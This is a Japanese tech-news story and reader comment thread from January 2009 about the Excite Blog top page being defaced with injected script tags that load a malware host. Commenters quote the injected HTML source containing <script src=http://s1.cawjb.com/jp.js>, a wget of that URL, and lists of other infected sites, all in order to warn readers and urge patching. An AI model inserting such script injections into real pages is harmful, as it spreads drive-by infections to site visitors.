エキサイトブログのトップページが改ざんされ、悪意のあるスクリプトが埋め込まれる 40
ストーリー by hylom
正月狙い? 部門より
正月狙い? 部門より
Motohiko 曰く、
セキュリティホールmemo 2009/1/4付け記事より。エキサイトブログトップページにマルウェアサイト s1.cawjb.com への接続を行うような改竄がされているとの話題がエキサイトブログ掲示板に挙がっている。タレコミ時点でもスクリプトが挿入されていることを確認している。
【緊急注意喚起】改ざんされたWebサイト閲覧による組織内へのボット潜入被害について[12/24更新] | LACによると、2008年12月後半から日本国内のコンピュータからのボットによるとみられる攻撃が急増していると推測されるという。同記事によると悪用されている脆弱性はMS06-014、MS08-078、Adobe Flash Playerのもの (詳細不明) とのことなので、まずは手許の環境のセキュリティ状態を確認しよう。
まだいる(4日1845現在) (スコア:3, 参考になる)
(送られてきているもの自体は、404表記のHTMLに見えるけど、詳しく追ってないので本当に404なのかは不明)
それと、safariで「cawjb.com」を(URL入力して)表示させようとすると、「ヤバいところにつなごうとしているよ!!」って教えてくれるのに、こういう方法で読み込まれちゃうと、何もメッセージがでないんだね。
意味半減だよね…
404表記のHTMLに見える (スコア:2, 参考になる)
<html><head><title>Object Not Found</title></head><body><h1>HTTP/1.1 404 Object Not Found</h1></body></html>
としか書かれていませんでした。すでに撤収済み?
ただGoogle Safe Browsing diagnostic page for cawjb.comページによれば、
"Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, cawjb.com appeared to function as an intermediary for the infection of 619 site(s) including 114korea.co.kr/, baekmin.com/, heartsave.co.kr/.
Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 1207 domain(s), including socuri.net/, beewonbowling.co.kr/, nexgens.com/."
ということで過去90日間に多くのサイトに埋め込まれた実績があるとか。今後復活するかもしれませんね。
http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://s1.cawjb.com/jp.js
モデレータは基本役立たずなの気にしてないよ
Re: (スコア:0)
Re: (スコア:0)
(休日は対応いたしませんって、暗に証明して見せちゃってるよな。コレ)
Re: (スコア:0)
攻撃方法も含めて全容解明するには、情報開示という名の協力が不可欠だと思いますが、果たしてそこまでしてくれる企業・団体が現れるかどうか…。
Webサイトへの攻撃方法は明らかです (スコア:1)
と書いてありますよ。そしてサイト管理者は無料の簡易Webサーバログ解析ツール「SecureSite Checker Free(SSCF)」 [lac.co.jp]を利用するようにともアドバイスされています。
モデレータは基本役立たずなの気にしてないよ
Re: (スコア:0)
編集者への疑問 (スコア:3, すばらしい洞察)
にもかかわらず、エキサイトブログのトップページへのリンクが
張られているのはなぜなんでしょうか?
うっかりクリックしてしまう人がいることを考えると、
対策がなされたことを確認するまではリンクを張るべきではないのでは?
Re:編集者への疑問 (スコア:3, おもしろおかしい)
Re:編集者への疑問 (スコア:1, すばらしい洞察)
良く知らない人が記事を読む可能性もありますよ。
Re: (スコア:0)
Re: (スコア:0)
Re: (スコア:0)
と念を押されると、いかなる手段を用いてでも押したくなるのがアレゲ魂。
むしろノーガード戦法の方が安全なのでは。
Re:編集者への疑問 (スコア:1)
エキサイトブログ掲示板のコメント (#6および) #8 [excite.co.jp]によると、リンク先のスクリプトは2008/12/19時点で削除されているとのことです。ドメインが失効している訳ではないので危険が再発する虞はありますが、ちょっとは安心ともいえるのではないかと。あとはセキュリティソフトがきちんとこの件を検出できるかですね (avast!が検出して云々というのが当該スレッドの始まりです)。
ところでオフトピですが、うちのVista機ではKB960714 (MS08-078のパッチ) がインストール出来ません。何かと衝突してるっぽいですが、このパッチはセーフモードではインストールできないんですよね…。一つ一つサービスを停止して試していかないといけないのかなぁ。
Re: (スコア:0)
Re: (スコア:0)
リンクをクリックするつもりはなく、Firefoxのウィンドウをアクティブにするつもりで手が滑りました(T_T)
Re: (スコア:0, 参考になる)
Re:編集者への疑問 (スコア:2, 興味深い)
どこに付けようかと思いましたが、ここにします。
ダウンロードしてみたら、実質的に空の内容だったから大丈夫と書かれている方が何名かいますが、User-Agent辺りをどういう設定でアクセスしたのか、書いてもらえるとより良い情報になろうかと思います。
ちょっと賢ければ、IEだと思わなければ、ダミーの内容を返すCGIにしている可能性がありますので。
ウイルス感染も注意 (スコア:2, 興味深い)
昨年はfc2で大規模にブログテンプレートが改竄され、
中国の某MMOアカウントハックウイルスに感染して被害が多数でました。
blogだとお題が明確なので、ターゲットを絞ったウイルスの頒布が効率よくできるという側面が
ある気がします。
今回、exblogが書きかえられたということは、fc2と同じ道をたどる可能性があるということでしょうか。
やっと (スコア:2, 参考になる)
細かくは書かないけど、とりあえず問題ないから安心してくれよナッ!
的な文章に感じてしまいました。
思わず (スコア:1, 興味深い)
とりあえず安全です (スコア:3, 参考になる)
>いいのかな?
と訊かれてもふつうは答えようがないんですけど(汗)。なぜか「興味深い」なんてモデが付いていますのでコメントしますと、皆さん書かれているとおり、現時点 ttp://s1.cawjb.com/jp.js ページ(Firefoxでアクセスすればブロックされます)には攻撃要素がまったくないため安全です。他のページへのリンクもありません。
しかしタレコミにもありますように、Windows や Flash player の脆弱性を利用した攻撃らしいので、とりあえず Windows Update し、Adobe Flash Player を最新版に [adobe.com]更新してあれば大丈夫かと思われます。
マイクロソフト セキュリティ情報 MS08-078 - 緊急 Internet Explorer 用のセキュリティ更新プログラム (960714) [microsoft.com]
Microsoft Data Access Components (MDAC) の機能の脆弱性により、コードが実行される可能性がある (911562) (MS06-014) [microsoft.com]
Flash の脆弱性の詳細が不明なのがちと気になりますが、非Windows なOS たとえば Linux や Mac OS X 、Solaris や FreeBSD、BeOS、OS/2 なんかを使っていれば無問題 [srad.jp]と思われますです。また JavaScript を使っての外部ファイルの読み込みを利用しているようですから、JavaScript も OFF にできるブラウザを使うのも有効かと(いろいろ不便ですが)。ええと他にもありますかね。
ただ今回の件、エキサイトブログに限らずかなり広範囲に影響している [srad.jp]ので、一度ご自分の環境のセキュリティについて考えてみることをお勧めしますよ。まず Windows Update の更新のチェックから。
$ wget http://s1.cawjb.com/jp.js (スコア:1)
# そーゆーものなの?
60.196.70.130 (スコア:3, 興味深い)
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html [apnic.net]
inetnum: 60.196.0.0 - 60.197.255.255
netname: BORANET
descr: DACOM, Internet Service Provider, Seoul, Korea
country: KR
admin-c: DB50-AP
tech-c: DB50-AP
status: ALLOCATED PORTABLE
mnt-by: APNIC-HM
mnt-lower: MNT-KRNIC-AP
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
remarks: This object can only be updated by APNIC hostmasters.
remarks: To update this object, please contact APNIC
remarks: hostmasters and include your organisation's account
remarks: name in the subject line.
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
changed: hm-changed@apnic.net 20040729
changed: hm-changed@apnic.net 20060328
source: APNIC
role: DACOM BORANET
address: DACOM Bldg., 706-1, Yoeksam-dong, Kangnam-ku
address: Seoul
country: KR
phone: +82-2-2089-7755
fax-no: +82-2-2089-0706
e-mail: ipadm@nic.bora.net
e-mail: abuse@bora.net
e-mail: security@bora.net
admin-c: PE32-AP
tech-c: PE32-AP
nic-hdl: DB50-AP
mnt-by: MNT-KRNIC-AP
notify: hostmaster@nic.or.kr
remarks: IP address administrator group of NIC team, DACOM Corp.
remarks: If related with spam, send mail to abuse@bora.net
remarks: If related with security, send mail to security@bora.net
remarks: Only for whois information correction, send mail to ipadm@nic.bora.net
changed: jeonsi@bora.net 20041105
changed: hm-changed@apnic.net 20060428
source: APNIC
inetnum: 60.196.0.0 - 60.197.255.255
netname: BORANET-KR
descr: LG DACOM Corporation
country: KR
admin-c: IA5-KR
tech-c: IA5-KR
status: ALLOCATED PORTABLE
mnt-by: MNT-KRNIC-AP
remarks: This information has been partially mirrored by APNIC from
remarks: KRNIC. To obtain more specific information, please use the
remarks: KRNIC whois server at whois.krnic.net.
changed: hostmaster@nic.or.kr
source: KRNIC
#そんだけ
Re: (スコア:0)
Re: (スコア:0)
Re:$ wget http://s1.cawjb.com/jp.js (スコア:1)
なので、そちらでは対応したってことじゃないかな。とりあえず。
11月中旬ぐらいからボット経由らしい ssh brute force がしつこかったが。12月27日になって、新しく日本の何箇所かが加わっていた形跡あり。
他にもやられたところはないかな (スコア:0, オフトピック)
モデレータは基本役立たずなの気にしてないよ
Re:他にもやられたところはないかな (スコア:4, 参考になる)
ビッグカメラ.comのようにすでに修正されたり削除されたところばかりですけどね。まだ修正されていないページも相当ありそうですよ。
たとえば、すでに攻撃ページがなくなっているのでリンクを張りますけど、
::: ハマ漢方皮膚クリニック [atopybest.jp]
パワ?生食(センシキ)30個入り<script src=http://s1.cawjb.com/jp.js
多摩人物園:人物情報:田中のぞみ [topicserv.com]
タイトルに仕込まれているのでわかりやすい。
ダイエイ:エコ商品一覧 [surfboard.co.jp]...
相当広範囲のサイトが被害にあっている模様。
# 時に煩わしいと感じながらもWindows Updateは自動更新にしているOS/2ユーザーのmasakun
モデレータは基本役立たずなの気にしてないよ
Re:他にもやられたところはないかな (スコア:3, 興味深い)
やられたと思われるところはたくさん出てきます。
が、よくみてみると埋め込みに失敗したものだけが
引っかかっているみたい...
Re: (スコア:0)
> 引っかかっているみたい...
Googleはマークアップの中身まで検索してくれませんからね。
大昔のAltaVistaはマークアップの中身を検索するモードがあったので、Javaアプレットだけを効率よく検索できたりして便利だったのですが。
source of http://exblog.jp/ (スコア:2, 興味深い)
<div class="mt15" id="oshirase">
<h2 class="left_title disp" title="お知らせ">お知らせ</h2>
<ul>
<li><a href="http://www.excite.co.jp/relocate3/?co=jp/xbg/blogstaff/7760840;http://staff.exblog.jp/7760840/" >
<font color="red"><strong>ブログパーツ機能を追加しました<script src=http://s1.cawjb.com/jp.js></script></strong></font>
</a>
<span>
[2008年12月24日]
</span>
</li>
<li><a href="http://www.excite.co.jp/relocate3/?co=jp/xbg/blogstaff/7678508;http://staff.exblog.jp/7678508/" >
ドガログサービス終了のお知らせ<script src=http://s1.cawjb.com/jp.js></script>
</a>
<span>
[2008年11月21日]
</span>
</li>
<li><a href="http://www.excite.co.jp/relocate3/?co=jp/xbg/blogstaff/7675309;http://staff.exblog.jp/7675309/" >
「友達の最新記事」の更新再開のお知らせ<script src=http://s1.cawjb.com/jp.js></script>
</a>
<span>
[2008年11月20日]
</span>
</li>
なお Firefox 3 で ttp://s1.cawjb.com/jp.js にアクセスすると、Reported Attack Site! というアラーム画面が表示されますね。:-)
Build identifier: Mozilla/5.0 (OS/2; U; Warp 4.5; en-US; rv:1.9.2a1pre) Gecko/20081229 Minefield/3.2a1pre
モデレータは基本役立たずなの気にしてないよ
Re:source of http://exblog.jp/ (スコア:1, 参考になる)
(Mozilla/5.0 (X11; U; Linux x86_64; ja-JP; rv:1.9.0.5) Gecko/2008121622 Ubuntu/8.04 (hardy) Firefox/3.0.5)
ぐぐってみた (スコア:0, 既出)
s.cawjb.com
を検索したら、
結構あちこちが怪しげにでてくる模様。用心には越したこと無いようですが・・・こまったもんだなあ。
↑余計なもの (スコア:0)
Re: (スコア:0)
これ [japancorp.net]なんか機械的にリンク埋めようとして失敗したげ?
つーかさ (スコア:0)
地方へ帰ったら6ヶ月前に終了したアニメがまだ終わってなかったみたいな感じだ。古い古い。
エロサイトブログのトップページが改ざん (スコア:0)
よくわからない (スコア:0)
ずっと前に始まった攻撃で誘導先はとっくになくなったけど攻撃だけがまだ自動で続いている状態?